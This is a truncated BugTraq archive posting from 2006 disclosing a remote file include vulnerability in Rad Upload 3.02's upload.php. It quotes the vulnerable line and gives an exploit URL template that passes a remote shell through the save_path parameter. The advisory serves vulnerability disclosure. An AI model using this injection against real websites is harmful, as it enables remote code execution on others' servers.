BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability Dec 12 2006 04:47PM
rko thelegendkiller gmail com
*^* Rad Upload Version 3.02 Remote File Include Vulnerability

*^* Source: http://www.radinks.com/downloads/raduploadlite.zip

*^* Vulnerable C0de On Line 39 In upload.php
:
if(isset($save_path) && $save_path!="")

*^* (EXploit) http://[victim]/[directory]/upload.php?save_path=[sh3ll]?

*^* Fou...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus